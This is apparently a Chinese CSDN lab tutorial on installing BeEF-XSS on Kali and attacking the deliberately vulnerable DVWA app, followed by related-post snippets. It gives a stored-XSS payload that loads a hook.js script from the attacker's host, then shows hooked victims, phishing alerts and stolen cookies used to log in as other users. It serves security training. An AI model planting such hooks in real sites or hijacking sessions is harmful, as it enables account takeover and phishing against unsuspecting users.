使用beef-xss实现DVWA免登

最新推荐文章于 2023-09-16 10:38:09 发布
最新推荐文章于 2023-09-16 10:38:09 发布
阅读量249 收藏 1
点赞数
文章标签: xss 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60829702/article/details/130137579
版权

1. 安装beef-xss

由于我之前使用的kali2021的key过期了,后面搞了很久也没搞好,所以我下载了kali2023版的来进行操作。

  • 更新kali

    apt-get update

使用这条命令更新kali时如果出现错误不要慌,先执行下面的命令看一下可以安装beef-xss吗,如果不行那就要去网上找解决办法了。或者直接下载新的kali。大家可以在这里下载kali2023,kali-images-kali-2023.1安装包下载_开源镜像站-阿里云 (aliyun.com)

  • 下载beef-xss
sudo apt-get install beef-xss
  • 安装fix-broken
apt --fix-broken install

ok,到这里beef-xss就下载完成了。

2. 启动beef-xss

使用sudo beef-xss启动。刚开始要设置密码。然后我们访问 http://(kali的ip地址):3000/ui/panel

在这里插入图片描述

用户名为beef,密码为设置的密码。

3. 登录dvwa

选择存储型xss,在文本框中输入

<script src="http://192.168.6.155:3000/hook.js"></script>

在这里插入图片描述

这个时候我们就可以在beef-xss中可以看到已经控制到目标主机了。

在这里插入图片描述

接下来为了演示存储型xss,我们将这个删除,然后重新登录dvwa时。一旦我们访问xss(stored),我们的主机就被控制。

我们使用另外一个用户登录。大家可以到dvwa数据库里面查找用户。

在这里插入图片描述

在这里插入图片描述

可以看到smithy这个用户也被控制了。

我们可以发送警告信息进行钓鱼

在这里插入图片描述

或者获取cookie,从而登录受害者账号。这里直接使用http://127.0.0.1/DVWA-master/访问,bp拦截修改cookie即可。

在这里插入图片描述

在这里插入图片描述

这里我是用的是火狐的Cookie-Editor插件修改的。修改完成后直接访问即可。

过往云烟~丰
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
raylib-beef:用于Beef编程语言的raylib绑定
05-06
雷利比牛肉 raylib-beef是Raylib 3.1 dev的Beef包装器库,这是一个简单易用的库。 结合Beef编程语言的优势,制作游戏绝对令人满足! 注意力! 这种绑定仍在开发中。 可能会发生错误。 二进制文件已从存储库中删除。 您可以从“下载包含二进制文件的库! 做什么了 绑定: raylib.h raymath.h rlgl.h(部分) Physac.h-警告! 符号不包含在已发布的二进制文件中! 缓和 重要笔记 文本操作方法没有绑定牛肉已经具有用于文本处理的自定义方法 rlgl绑定已部分完成 库是使用/ MT标志静态编译的 去做: 绑定其他头文件: raygui.h 将示例重写为Beef 对raylib-beef(RayApp)(??)进行更高的抽象 快速入门(使用Beef IDE) 下载raylib-beef并将其复制到以下位置: C:\ Progra
beef-installer:用于发行版和Termux的BeEF安装程序!
04-17
牛肉安装机 该脚本可自动从GitHub安装BeEF(浏览器利用框架)。 要使用它以root身份运行: (为了): git clone https://github.com/tony23x/beef-install.git cd beef-installer;ls bash install.sh python3 beef-installer.py 准备好了! 如果是disro,则牛肉目录将位于环境变量$ HOME中,位于termux中的$ PREFIX / opt中 Kali Linux(PC,Userland) Kali Nethunter无根 Termux 预览: Termux
squid3-beEF:概念证明 - 使用 squid url 重写功能“劫持”代理流量并将 BeEF 负载注入其中
06-23
Squid3-beEF 概念证明 - 使用 url 重写功能“劫持”代理流量并将负载注入其中。 要求 PHP 5.3 阿帕奇 mod_php 安装 将 rewrite.php 和 payload.js 复制到 apache 文档根目录 使用以下命令使 rewrite.php 可执行chmod +x /rewrite.php 编辑 /etc/squid3/squid.conf 并添加以下行url_rewrite_program /rewrite.php 将 payload.js 中的 #_ BEEFURL _# 更改为 BeEF Hook URL 创建空文件夹并允许所有用户写入 mkdir -p /有效载荷 chmod 0777 /有效载荷 一定要重启squid3(sudo service squid3 restart)来刷新更改。
Web漏洞_XSScookie与session、DVWA1.9版本XSS反射型、存储型靶机实验、BeEF基本使用
BeatRex的博客
04-05 1651
一、原理 二、分类 三、绕过 注意标签的闭合 大小写绕过 双写绕过 图片标签加事件绕过 <img src=# alert('xss')>)
BeEF-XSS详细使用教程
热门推荐
星落的博客
05-12 4万+
BeEF-XSS简介 BeEF-XSS是一款非常强大的web框架攻击平台,集成了许多payload,可以实现许多功能! 启动BeFF-XSS BeEF-XSS管理登录页面 用户名默认为beef,密码在首次启动beef-xss时需要手动设置。(启动beef-xss会自动打开浏览器) BeEF-XSS主页面介绍 Hocked Browers online browers 在线浏览器 offline browers 离线浏览器 Detials 浏览器、插件版本信息,操作系统信息 L.
利用 BeEF 执行 XSS 攻击的总结
weixin_71139244的博客
05-27 1009
跨站脚本攻击,简称XSS,是一种网站应用程序的安全漏洞攻击,属于代码注入的一种;与其他攻击相比,XSS攻击所带来的危害更大。跨站脚本攻击XSS,是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。
一个好玩的工具BeEF介绍
luluoluoa的博客
05-07 1787
beef BeEF-XSS是一款非常强大的web框架攻击平台,集成了许多payload,可以实现许多功能 BeEF-XSS可以说是最强大的XSS漏洞利用工具,可以收集浏览器信息、键盘记录、社会工程等 总之就是使用beef这个工具来利用xss漏洞的 beef安装 我在kail虚拟机上安装的,很简单的在终端输入一句命令sudo apt setup beef-xss,然后安装成功设置密码就行了,因为之后在浏览器打开需要登陆登陆beef,密码就是安装时设置的那个 beef打开 在终端输入命令beef
dvwaxss使用beef
Alsn86的博客
01-18 630
dvwaxss使用beef kali ip为192.168.253.8,在kali里启动beef 在自动跳转出的登录页面登录beef,用户名密码都是beef 在受害机,192.168.253.8,进行xss,其中<script src=http://192.168.253.132:3000/hook.js>,点击提交 好了,beef里可以看见192.168.253.8上线了,获取cookie, 上线后就出现很多可以利用的模块了,我们试试重定向 发现192.168.253.8
DVWA模块使用教程(二)
Estrus5的博客
04-30 4400
一、Brute Force使用 1、打开Brute Force界面,测试登陆框是否存在注入,提交敏感字符测试程序是否报错。在登录界面上输入用户名admin’(使用敏感字符‘)。 会弹出如下界面 2、仔细观察登录系统时地址栏中的sql语句,在用户名密码提交界面上通过注入逻辑语句使登录判断失效,进入受保护页面。(这样可以不使用密码就可以直接登录啦!) 二、Command Injection命令注入 1、打开Command Injection界面,在该界面提供一个命令行执行环境,输入ip地址返回ping命令的
kali linux(2021)版本 进行DVWA安全等级反射型XSS攻击并介绍beef-xss的安装及详细使用
weixin_39464539的博客
06-09 1989
xss原理及分类 XSS攻击的原理: XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。 XSS攻击本质上是一种将恶意脚本嵌入到当前网页并执行的攻击方式。 一般来说存在XSS攻击风险的功能点主要涉及一下两种: 评论功能: 用户输入评论(评论处为攻击代码) 论坛私信功能 用户发送私信(私信内夹带攻击代码) 技术分类 根基 X
DVWA下的XSS
07-25
DVWA下的XSS
dvwa环境搭建以及模拟攻击
08-22
dvwa环境搭建以及模拟攻击方法 win7环境下! 
vasp.5.4.4&beef-src.tar.xz
03-20
beef-vdW全称为Bayesian error estimation functional with van der Waals correlation, 是DTU在2012年做出来的一个新泛函,目前和Quantum Espresso,VASP,GPAW均有接口。具体的编译过程可以参考SUNCAT - Software...
Web应用安全XSS通过JavaScript攻击(实验).docx
06-20
在Kali上安装beef-xss工具; 在站点上进行XSS JavaScript攻击。 (附加题)使用beef尝试更多XSS JavaScript功能。 三、实验内容与步骤 在Kali上安装beef-xss工具: 1.1、首先打开Kali,将kali的下载源换成国内中科大...
利用beef盗取浏览器cookie,并实现页面跳转
鲨鱼辣椒的博客
05-19 1781
实验环境 KALI kali中需要安装beef工具 DVWA靶场 客户端 我是在本地搭的靶场,然后开两台虚拟机,一台kali当作攻击者,一台任何系统的主机 搭建靶场 首先搭建靶场,开启phpstudy让让别人可以访问就可以了(我这边的靶场是安装好的,如果没有安装的话可以先去下载) 下载安装步骤:先去phpstady官网下载一个最新版的phpstudy(这个最新版的不用配置环境直接安装就能用特别方便),然后找到DWVS的数据包下载下来(如果找不到的话我可以发给你),放到phpstudy的ww
beef-xss的部分模块使用
olddocument的博客
01-24 2719
安装beef-xss sudo apt-get install beef-xss 启动 beef-xss 启动后可以在终端看见需要输入的脚本 为kali的ip地址 回到kali可以发现连接上了 online browers 在线浏览器 offline browers 离线浏览器 Detials 浏览器、插件版本信息,操作系统信息 Logs 浏览器动作:焦点变化,鼠标单击,信息输入 commands 绿色模块:表示模块适用当前用户,并且执行结果对用户不可见 红色模块:表示模块不适用当前用户,有些红色模
kali2021安装beef-xss使用
qq_53365842的博客
03-29 3360
安装beef:apt install beef-xss 切换到beef目录(kali版本不同,beef配置文件位置不同): cd /etc/beef-xss/config.yaml 或者 cd /usr/share/beef-xss/config.yaml 打开配置文件: vim /etc/beef-xss/config.yaml / vim /usr/share/beef-xss/config.yaml 修改密码和修改host值,改成kali的IP地址 启动beefbeef-xss/beef
在kali环境下安装Beef-Xss靶场搭建
weixin_51525416的博客
09-02 1887
在kali环境下安装Beef-Xss靶场搭建
跨站脚本攻击实验-beef
m0_63645854的博客
09-16 363
本文主要介绍了XSS工具/手工攻击的原理,XSS工具/手工攻击的方法以及防御XSS的方法/原理
云服务器上搭建beef-xss
最新发布
03-11
8. 测试和使用使用Web浏览器访问云服务器的IP地址和端口号,进入beef-xss的管理界面,开始进行漏洞测试和XSS攻击。 请注意,在进行任何安全测试和攻击活动之前,确保你已经获得了合法的授权,并且遵守法律和道德...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值